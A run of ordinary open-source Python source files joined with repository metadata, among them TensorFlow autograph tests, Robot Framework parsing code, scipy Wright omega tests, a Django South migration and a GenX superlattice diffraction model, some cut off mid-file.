if config(_address_map[endpoint_type]['config']) is None:
# Assume vip is simple and pass back directly
resolved_address = config('vip')
else:
for vip in config('vip').split():
if is_address_in_network(
config(_address_map[endpoint_type]['config']),
vip):
resolved_address = vip
else:
if config('prefer-ipv6'):
fallback_addr = get_ipv6_addr()
else:
fallback_addr = unit_get(_address_map[endpoint_type]['fallback'])
resolved_address = get_address_in_network(
config(_address_map[endpoint_type]['config']), fallback_addr)
if resolved_address is None:
raise ValueError('Unable to resolve a suitable IP address'
' based on charm state and configuration')
else:
return resolved_address
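# Hedged usage sketch (assumed caller code, not part of this module): 'configs' is the
# OSTemplateRenderer-style object described in canonical_url's docstring.
#   base = canonical_url(configs, endpoint_type=INTERNAL)
#   endpoint = '{}:{}'.format(base, 5000)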
|
kevin-coder/tensorflow-fork
|
tensorflow/python/autograph/impl/conversion_test.py
|
Python
|
apache-2.0
| 6,484
| 0.005244
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conversion module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.python.autograph import utils
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.impl import api
from tensorflow.python.autograph.impl import conversion
from tensorflow.python.autograph.pyct import compiler
from tensorflow.python.framework import constant_op
from tensorflow.python.keras.engine import training
from tensorflow.python.platform import test
class ConversionTest(test.TestCase):
def _simple_program_ctx(self):
return converter.ProgramContext(
options=converter.ConversionOptions(recursive=True),
autograph_module=api)
def test_is_whitelisted_for_graph(self):
def test_fn():
return constant_op.constant(1)
self.assertFalse(conversion.is_whitelisted_for_graph(test_fn))
self.assertTrue(conversion.is_whitelisted_for_graph(utils))
self.assertTrue(conversion.is_whitelisted_for_graph(constant_op.constant))
def test_convert_entity_to_ast_unsupported_types(self):
with self.assertRaises(NotImplementedError):
program_ctx = self._simple_program_ctx()
conversion.convert_entity_to_ast('dummy', program_ctx)
def test_convert_entity_to_ast_callable(self):
b = 2
def f(a):
return a + b
program_ctx = self._simple_program_ctx()
nodes, name, info = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertIs(info.namespace['b'], b)
def test_convert_entity_to_ast_function_with_defaults(self):
b = 2
c = 1
def f(a, d=c + 1):
return a + b + d
program_ctx = self._simple_program_ctx()
nodes, name, _ = conversion.convert_entity_to_ast(f, program_ctx)
fn_node, = nodes
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual('tf__f', name)
self.assertEqual(
compiler.ast_to_source(fn_node.args.defaults[0]).strip(), 'None')
def test_convert_entity_to_ast_call_tree(self):
def g(a):
return a
def f(a):
return g(a)
program_ctx = self._simple_program_ctx()
nodes, _, _ = conversion.convert_entity_to_ast(f, program_ctx)
f_node, = nodes
self.assertEqual('tf__f', f_node.name)
def test_convert_entity_to_ast_class_hierarchy(self):
class TestBase(object):
def __init__(self, x='base'):
self.x = x
def foo(self):
return self.x
def bar(self):
return self.x
class TestSubclass(TestBase):
def __init__(self, y):
super(TestSubclass, self).__init__('sub')
self.y = y
def foo(self):
return self.y
def baz(self):
return self.y
program_ctx = self._simple_program_ctx()
with self.assertRaisesRegex(NotImplementedError, 'classes.*whitelisted'):
conversion.convert_entity_to_ast(TestSubclass, program_ctx)
def test_convert_entity_to_ast_class_hierarchy_whitelisted(self):
class TestSubclass(training.Model):
def __init__(self, y):
super(TestSubclass, self).__init__()
self.built = False
def call(self, x):
return 3 * x
program_ctx = self._simple_program_ctx()
(import_node, class_node), name, _ = conversion.convert_entity_to_ast(
TestSubclass, program_ctx)
self.assertEqual(import_node.names[0].name, 'Model')
self.assertEqual(name, 'TfTestSubclass')
self.assertEqual(class_node.name, 'TfTestSubclass')
def test_convert_entity_to_ast_lambda(self):
b = 2
f = lambda x: b * x if x > 0 else -x
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['b'], b)
def test_convert_entity_to_ast_multiple_lambdas(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda y: b * y)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
self.assertIs(entity_info.namespace['a'], a)
def test_convert_entity_to_ast_multiple_lambdas_ambiguous_definitions(self):
a, b = 1, 2
f, _ = (lambda x: a * x, lambda x: b * x)
program_ctx = self._simple_program_ctx()
with self.assertRaises(ValueError):
conversion.convert_entity_to_ast(f, program_ctx)
def test_convert_entity_to_ast_lambda_code_with_garbage(self):
# pylint:disable=g-long-lambda
f = ( # intentional wrap
lambda x: (
x # intentional wrap
+ 1),)[0]
# pylint:enable=g-long-lambda
program_ctx = self._simple_program_ctx()
(fn_node,), name, _ = conversion.convert_entity_to_ast(f, program_ctx)
self.assertIsInstance(fn_node, gast.Assign)
self.assertIsInstance(fn_node.value, gast.Lambda)
self.assertEqual('tf__lambda', name)
def test_convert_entity_to_ast_nested_functions(self):
b = 2
def f(x):
def g(x):
return b * x
return g(x)
program_ctx = self._simple_program_ctx()
(fn_node,), name, entity_info = conversion.convert_entity_to_ast(
f, program_ctx)
self.assertIsInstance(fn_node, gast.FunctionDef)
self.assertEqual(fn_node.name, 'tf__f')
self.assertEqual('tf__f', name)
self.assertIs(entity_info.namespace['b'], b)
if __name__ == '__main__':
test.main()
|
alexandrul-ci/robotframework
|
src/robot/parsing/populators.py
|
Python
|
apache-2.0
| 8,341
| 0.001079
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from robot.errors import DataError
from robot.model import SuiteNamePatterns
from robot.output import LOGGER
from robot.utils import get_error_message, unic
from .datarow import DataRow
from .tablepopulators import (SettingTablePopulator, VariableTablePopulator,
TestTablePopulator, KeywordTablePopulator,
NullPopulator)
from .htmlreader import HtmlReader
from .tsvreader import TsvReader
from .txtreader import TxtReader
from .restreader import RestReader
READERS = {'html': HtmlReader, 'htm': HtmlReader, 'xhtml': HtmlReader,
'tsv': TsvReader , 'rst': RestReader, 'rest': RestReader,
'txt': TxtReader, 'robot': TxtReader}
# Hook for external tools for altering ${CURDIR} processing
PROCESS_CURDIR = True
class FromFilePopulator(object):
_populators = {'setting': SettingTablePopulator,
'variable': VariableTablePopulator,
'test case': TestTablePopulator,
'keyword': KeywordTablePopulator}
def __init__(self, datafile):
self._datafile = datafile
self._populator = NullPopulator()
self._curdir = self._get_curdir(datafile.directory)
def _get_curdir(self, path):
return path.replace('\\','\\\\') if path else None
def populate(self, path):
LOGGER.info("Parsing file '%s'." % path)
source = self._open(path)
try:
self._get_reader(path).read(source, self)
except:
raise DataError(get_error_message())
finally:
source.close()
def _open(self, path):
if not os.path.isfile(path):
raise DataError("Data source does not exist.")
try:
# IronPython handles BOM incorrectly if not using binary mode:
# https://ironpython.codeplex.com/workitem/34655
return open(path, 'rb')
except:
raise DataError(get_error_message())
def _get_reader(self, path):
extension = os.path.splitext(path.lower())[-1][1:]
try:
return READERS[extension]()
except KeyError:
raise DataError("Unsupported file format '%s'." % extension)
def start_table(self, header):
self._populator.populate()
table = self._datafile.start_table(DataRow(header).all)
self._populator = self._populators[table.type](table) \
if table is not None else NullPopulator()
return bool(self._populator)
def eof(self):
self._populator.populate()
def add(self, row):
if PROCESS_CURDIR and self._curdir:
row = self._replace_curdirs_in(row)
data = DataRow(row)
if data:
self._populator.add(data)
def _replace_curdirs_in(self, row):
return [cell.replace('${CURDIR}', self._curdir) for cell in row]
class FromDirectoryPopulator(object):
ignored_prefixes = ('_', '.')
ignored_dirs = ('CVS',)
def populate(self, path, datadir, include_suites=None,
warn_on_skipped=False, include_extensions=None, recurse=True):
LOGGER.info("Parsing test data directory '%s'" % path)
include_suites = self._get_include_suites(path, include_suites or [])
init_file, children = self._get_children(path, include_extensions,
include_suites)
if init_file:
self._populate_init_file(datadir, init_file)
if recurse:
self._populate_children(datadir, children, include_extensions,
include_suites, warn_on_skipped)
def _populate_init_file(self, datadir, init_file):
datadir.initfile = init_file
try:
FromFilePopulator(datadir).populate(init_file)
except DataError as err:
LOGGER.error(err.message)
def _populate_children(self, datadir, children, include_extensions,
include_suites, warn_on_skipped):
for child in children:
try:
datadir.add_child(child, include_suites, include_extensions,
warn_on_skipped)
except DataError as err:
self._log_failed_parsing("Parsing data source '%s' failed: %s"
% (child, err.message), warn_on_skipped)
def _log_failed_parsing(self, message, warn):
if warn:
LOGGER.warn(message)
else:
LOGGER.info(message)
def _get_include_suites(self, path, incl_suites):
if not isinstance(incl_suites, SuiteNamePatterns):
incl_suites = SuiteNamePatterns(self._create_included_suites(incl_suites))
if not incl_suites:
return incl_suites
# If a directory is included, also all its children should be included.
if self._directory_is_included(path, incl_suites):
return SuiteNamePatterns()
return incl_suites
def _create_included_suites(self, incl_suites):
for suite in incl_suites:
yield suite
while '.' in suite:
suite = suite.split('.', 1)[1]
yield suite
def _directory_is_included(self, path, incl_suites):
name = os.path.basename(os.path.normpath(path))
return self._is_in_included_suites(name, incl_suites)
def _get_children(self, dirpath, incl_extensions, incl_suites):
init_file = None
children = []
for path, is_init_file in self._list_dir(dirpath, incl_extensions,
incl_suites):
if is_init_file:
if not init_file:
init_file = path
else:
LOGGER.error("Ignoring second test suite init file '%s'." % path)
else:
children.append(path)
return init_file, children
def _list_dir(self, dir_path, incl_extensions, incl_suites):
# os.listdir returns Unicode entries when path is Unicode
names = os.listdir(unic(dir_path))
for name in sorted(names, key=lambda item: item.lower()):
name = unic(name) # needed to handle nfc/nfd normalization on OSX
path = os.path.join(dir_path, name)
base, ext = os.path.splitext(name)
ext = ext[1:].lower()
if self._is_init_file(path, base, ext, incl_extensions):
yield path, True
elif self._is_included(path, base, ext, incl_extensions, incl_suites):
yield path, False
else:
LOGGER.info("Ignoring file or directory '%s'." % name)
def _is_init_file(self, path, base, ext, incl_extensions):
return (base.lower() == '__init__' and
self._extension_is_accepted(ext, incl_extensions) and
os.path.isfile(path))
def _extension_is_accepted(self, ext, incl_extensions):
if incl_extensions:
return ext in incl_extensions
return ext in READERS
def _is_included(self, path, base, ext, incl_extensions, incl_suites):
if base.startswith(self.ignored_prefixes):
return False
if os.path.isdir(path):
return base not in self.ignored_dirs or ext
if not self._extension_is_accepted(ext, incl_extensions):
return False
return self._is_in_included_suites(base, incl_suites)
def _is_in_included_suites(self, name, incl_s
|
jawilson/home-assistant
|
tests/components/usb/__init__.py
|
Python
|
apache-2.0
| 753
| 0
|
"""Tests for the USB Discovery integration.
"""
from homeassistant.components.usb.models import USBDevice
conbee_device = USBDevice(
device="/dev/cu.usbmodemDE24338801",
vid="1CF1",
pid="0030",
serial_number="DE2433880",
manufacturer="dresden elektronik ingenieurtechnik GmbH",
description="ConBee II",
)
slae_sh_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="10C4",
pid="EA60",
serial_number="00_12_4B_00_22_98_88_7F",
manufacturer="Silicon Labs",
description="slae.sh cc2652rb stick - slaesh's iot stuff",
)
electro_lama_device = USBDevice(
device="/dev/cu.usbserial-110",
vid="1A86",
pid="7523",
serial_number=None,
manufacturer=None,
description="USB2.0-Serial",
)
|
iamsteadman/bambu-mail
|
bambu_mail/receivers.py
|
Python
|
apache-2.0
| 217
| 0.036866
|
from bambu_mail.shortcuts import subscribe
def newsletter_optin(sender, user, **kwargs):
subscribe(
user.email,
list_id = 'signup',
double_optin = False,
send_welcome = False
)
|
titiushko/readthedocs.org
|
readthedocs/doc_builder/constants.py
|
Python
|
mit
| 491
| 0.002037
|
'''Doc build constants'''
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
DOCKER_SOCKET = getattr(settings, 'DOCKER_SOCKET', 'unix:///var/run/docker.sock')
DOCKER_VERSION = getattr(settings, 'DOCKER_VERSION', 'auto')
DOCKER_IMAGE = getattr(settings, 'DOCKER_IMAGE', 'rtfd-build')
DOCKER_LIMITS = {'memory': '200m', 'time': 600}
DOCKER_LIMITS.update(getattr(settings, 'DOCKER_LIMITS', {}))
DOCKER_TIMEOUT_EXIT_CODE = 42
DOCKER_OOM_EXIT_CODE = 137
|
nikitanovosibirsk/district42
|
tests/dict/test_dict_keys.py
|
Python
|
mit
| 572
| 0
|
from typing import KeysView
from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_empty_keys():
with given:
sch = schema.dict
with when:
res = sch.keys()
with then:
assert res == KeysView([])
def test_dict_keys():
with given:
sch = schema.dict({
"id": schema.int,
"name": schema.str,
optional("email"): schema.str,
})
with when:
res = sch.keys()
with then:
assert res == KeysView(["id",
|
"name", "email"])
|
petrlosa/ella
|
ella/core/south_migrations/0005_auto__add_field_category_content__add_field_category_template.py
|
Python
|
bsd-3-clause
| 11,864
| 0.008092
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Category.content'
db.add_column('core_category', 'content', self.gf('django.db.models.fields.TextField')(default='', blank=True), keep_default=False)
# Adding field 'Category.template'
db.add_column('core_category', 'template', self.gf('django.db.models.fields.CharField')(default='category.html', max_length=100), keep_default=False)
def backwards(self, orm):
# Deleting field 'Category.content'
db.delete_column('core_category', 'content')
# Deleting field 'Category.template'
db.delete_column('core_category', 'template')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.author': {
'Meta': {'object_name': 'Author'},
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
'core.category': {
'Meta': {'unique_together': "(('site', 'tree_path'),)", 'object_name': 'Category'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'template': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tree_parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']", 'null': 'True', 'blank': 'True'}),
'tree_path': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'core.dependency': {
'Meta': {'object_name': 'Dependency'},
            'dependent_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'depends_on_set'", 'to': "orm['contenttypes.ContentType']"}),
'dependent_id': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'target_ct': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'dependency_for_set'", 'to': "orm['contenttypes.ContentType']"}),
'target_id': ('django.db.models.fields.IntegerField', [], {})
},
'core.listing': {
'Meta': {'object_name': 'Listing'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Category']"}),
'commercial': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'publish_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'publishable': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Publishable']"})
},
'core.publishable': {
'Meta': {'object_name': 'Publishable'},
'app_data': ('app_data.fields.AppDataField', [], {'default': "'{}'", 'blank': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['core.Author']", 'symmetrical': 'False'}),
'category': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['core.Category']"}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'photo': ('ella.core.cache.fields.CachedForeignKey', [], {'to': "orm['photos.Photo']", 'null': 'True', 'blank': 'True'}),
'publish_from': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(3000, 1, 1, 0, 0, 0, 2)', 'db_index': 'T
|
jamestwebber/scipy
|
scipy/special/tests/test_wrightomega.py
|
Python
|
bsd-3-clause
| 3,616
| 0.000277
|
from __future__ import division, print_function, absolute_import
import pytest
import numpy as np
from numpy.testing import assert_, assert_equal, assert_allclose
import scipy.special as sc
from scipy.special._testutils import assert_func_equal
def test_wrightomega_nan():
pts = [complex(np.nan, 0),
complex(0, np.nan),
complex(np.nan, np.nan),
complex(np.nan, 1),
complex(1, np.nan)]
for p in pts:
res = sc.wrightomega(p)
assert_(np.isnan(res.real))
assert_(np.isnan(res.imag))
def test_wrightomega_inf_branch():
pts = [complex(-np.inf, np.pi/4),
complex(-np.inf, -np.pi/4),
complex(-np.inf, 3*np.pi/4),
complex(-np.inf, -3*np.pi/4)]
expected_results = [complex(0.0, 0.0),
complex(0.0, -0.0),
complex(-0.0, 0.0),
complex(-0.0, -0.0)]
for p, expected in zip(pts, expected_results):
res = sc.wrightomega(p)
# We can't use assert_equal(res, expected) because in older versions of
# numpy, assert_equal doesn't check the sign of the real and imaginary
# parts when comparing complex zeros. It does check the sign when the
# arguments are *real* scalars.
assert_equal(res.real, expected.real)
assert_equal(res.imag, expected.imag)
def test_wrightomega_inf():
pts = [complex(np.inf, 10),
complex(-np.inf, 10),
complex(10, np.inf),
complex(10, -np.inf)]
for p in pts:
assert_equal(sc.wrightomega(p), p)
def test_wrightomega_singular():
pts = [complex(-1.0, np.pi),
complex(-1.0, -np.pi)]
for p in pts:
res = sc.wrightomega(p)
assert_equal(res, -1.0)
assert_(np.signbit(res.imag) == False)
@pytest.mark.parametrize('x, desired', [
(-np.inf, 0),
(np.inf, np.inf),
])
def test_wrightomega_real_infinities(x, desired):
    assert sc.wrightomega(x) == desired
def test_wrightomega_real_nan():
assert np.isnan(sc.wrightomega(np.nan))
def test_wrightomega_real_series_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = 1e20
x_before_crossover = np.nextafter(crossover, -np.inf)
x_after_crossover = np.nextafter(crossover, np.inf)
# Computed using Mpmath
desired_before_crossover = 99999999999999983569.948
desired_after_crossover = 100000000000000016337.948
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_exp_approximation_crossover():
desired_error = 2 * np.finfo(float).eps
crossover = -50
x_before_crossover = np.nextafter(crossover, np.inf)
x_after_crossover = np.nextafter(crossover, -np.inf)
# Computed using Mpmath
desired_before_crossover = 1.9287498479639314876e-22
desired_after_crossover = 1.9287498479639040784e-22
assert_allclose(
sc.wrightomega(x_before_crossover),
desired_before_crossover,
atol=0,
rtol=desired_error,
)
assert_allclose(
sc.wrightomega(x_after_crossover),
desired_after_crossover,
atol=0,
rtol=desired_error,
)
def test_wrightomega_real_versus_complex():
x = np.linspace(-500, 500, 1001)
results = sc.wrightomega(x + 0j).real
assert_func_equal(sc.wrightomega, results, x, atol=0, rtol=1e-14)
|
haozhangphd/genx-py3
|
genx/models/sxrd_mult.py
|
Python
|
gpl-3.0
| 12,753
| 0.008469
|
'''<h1>Library for surface x-ray diffraction simulations of superlattices</h1>
<p> The model is based on Fullerton's algorithm for superlattices as
described in Phys. Rev. B vol. 45 p. 9292 (1992).
'''
# Programmed by Matts Bjorck 20091215
import numpy as np
import genx.models.sxrd
from genx.models.utils import f, rho
import time
from genx.models.sxrd import UnitCell, AtomGroup, Instrument, Slab, SymTrans
__pars__ = ['SLSample', 'SLStandard', 'UnitCell', 'Slab', 'AtomGroup',
'Instrument']
class SLSample:
'''Class that models a multilayer sample on top of a
    substrate according to Fullerton's model as given in
PRB ....
'''
def __init__(self, inst, bulk_slab, superlattice, unitcell,
bulk_sym = []):
self.set_bulk_slab(bulk_slab)
self.set_bulk_sym(bulk_sym)
self.superlattice = superlattice
self.inst = inst
self.set_unit_cell(unitcell)
def set_bulk_slab(self, bulk_slab):
'''Set the bulk unit cell to bulk_slab
'''
if not isinstance(bulk_slab, type(genx.models.sxrd.Slab())):
raise TypeError("The bulk slab has to be a member of"
" class Slab")
self.bulk = bulk_slab
def set_unit_cell(self, unit_cell):
'''Sets the unitcell of the sample
'''
if not isinstance(unit_cell, type(genx.models.sxrd.UnitCell(1.0, 1.0, 1.0))):
raise TypeError("The bulk slab has to be a member"
" of class UnitCell")
        if unit_cell is None:
            unit_cell = genx.models.sxrd.UnitCell(1.0, 1.0, 1.0)
self.unit_cell = unit_cell
def set_bulk_sym(self, sym_list):
'''Sets the list of allowed symmetry operations for the bulk
sym_list has to be a list ([]) of symmetry elements from the
class SymTrans
'''
# Type checking
if not isinstance(sym_list, type([])):
raise TypeError("The surface symmetries has to contained"
" in a list")
if sym_list == []:
sym_list = [genx.models.sxrd.SymTrans()]
if min([isinstance(sym, type(genx.models.sxrd.SymTrans())) for
sym in sym_list]) == 0:
raise TypeError("All members in the symmetry list has to"
" be a memeber of class SymTrans")
self.bulk_sym = sym_list
def calc_i(self, h, k, l):
'''Calculate the diffracted intensity from a superlattice.
The diffracted intensity from the superlattice and the substrate
are added. I.e. it is assumed that the films is not coherent with
the substrate.
'''
bulk_i = np.abs(self.calc_fb(h, k, l))**2
sl_i = np.abs(self.superlattice.calc_i(h, k, l))
return (bulk_i + sl_i)*self.inst.inten
def calc_fb(self, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, el, u, oc, c = self.bulk._extract_values()
oc = oc/float(len(self.bulk_sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Calculate the "shape factor" for the CTRs
eff_thick = self.unit_cell.c/np.sin(self.inst.alpha*np.pi/180.0)
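        # The factor 2.82e-5 is, presumably, the classical electron radius in
        # Angstrom; together with the imaginary parts of f it gives the
        # absorption attenuation used in the CTR denominator below.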
alpha = (2.82e-5*self.inst.wavel*eff_thick/self.unit_cell.vol()*
np.sum(f.imag,1))
denom = np.exp(2.0*np.pi*1.0J*l)*np.exp(-alpha) - 1.0
# Delta functions to remove finite size effect in hk plane
delta_funcs=(abs(h - np.round(h)) < 1e-12)*(
abs(k - np.round(k)) < 1e-12)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in self.bulk_sym], 0)
,1)
        # Putting it all together
fb = f_u/denom*delta_funcs
return fb
class Superlattice:
    '''Class that describes a superlattice; it can be subclassed
to implement different strain profiles, interdiffusion etc..
'''
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
self.a_slab = a_slab
self.b_slab = b_slab
if a_sym == []:
self.a_sym = [genx.models.sxrd.SymTrans()]
else:
self.a_sym = a_sym
if b_sym == []:
self.b_sym = [genx.models.sxrd.SymTrans()]
else:
self.b_sym = b_sym
self.unit_cell = unit_cell
self.inst = inst
    def _extract_slab_values(self, slabs, sym):
'''Extracts the necessary parameters for simulating
a list of stacked slabs
'''
# Extract the parameters we need
        # the star in zip(*... transforms the list elements to arguments
xt, yt, zt, elt, ut, oct, ct = list(zip(*[slab._extract_values()
for slab in slabs]))
        x = np.r_[xt]
y = np.r_[yt]
# scale and shift the slabs with respect to each other
cn = np.cumsum(np.r_[0, ct])[:-1]
z = np.concatenate([zs*c_s + c_cum
for zs, c_cum, c_s in zip(zt, cn, ct)])
#el = reduce(lambda x,y:x+y, elt)
el = np.r_[elt]
u = np.r_[ut]
oc = np.r_[oct]
#print x,y,z, u
t_lay = sum(ct)
return x, y, z, u, oc, el, t_lay
def calc_fslab(self, slablist, sym, h, k, l):
'''Calculate the structure factors from the bulk
'''
dinv = self.unit_cell.abs_hkl(h, k, l)
x, y, z, u, oc, el, t_lay = self._extract_slab_values(slablist,
sym)
oc = oc/float(len(sym))
f = genx.models.sxrd._get_f(self.inst, el, dinv)
# Sum up the uc struct factors
f_u = np.sum(oc*f*np.exp(-2*np.pi**2*u*dinv[:, np.newaxis]**2)*
np.sum([np.exp(2.0*np.pi*1.0J*(
h[:,np.newaxis]*sym_op.trans_x(x, y) +
k[:,np.newaxis]*sym_op.trans_y(x, y) +
l[:,np.newaxis]*z [np.newaxis, :]))
for sym_op in sym], 0)
,1)
#return f_u, (z.max() - z.min())*np.ones(l.shape)
return f_u, t_lay*np.ones(l.shape)
def calc_fa(self, n, h, k, l):
        '''Calculate the structure factor for an a layer
n is the thickness of the bilayer in units of slabs'''
pass
def calc_fb(self, n, h, k, l):
        '''Calculate the structure factor for a b layer
n is the thickness of the bilayer in units of slabs'''
pass
def calc_fsl(self, unit_cell, h, k, l):
        '''Calculate the structure factor for the entire
superlattice.
'''
raise NotImplementedError('calc_fsl has to be implemented in '
'a Superlattices subclass')
class SLStandard(Superlattice):
'''Class that implements a "standard" superlattice, no strain
included.
'''
_pars = {'sigmaa': 1e-12, 'sigmab':1e-12, 'repetitions':2, 'na':2,
'nb': 2,'a': 0.0, 'c':1e-12}
def __init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = [], b_sym = []):
Superlattice.__init__(self, inst, unit_cell, a_slab, b_slab,
a_sym = a_sym, b_sym = b_sym)
[self._make_set_func(name, self._pars[name]) for name in
list(self._pars.keys())]
[self._make_get_func(name) for name in list(self._pars.keys())]
def calc_fa(self, n, h, k, l):
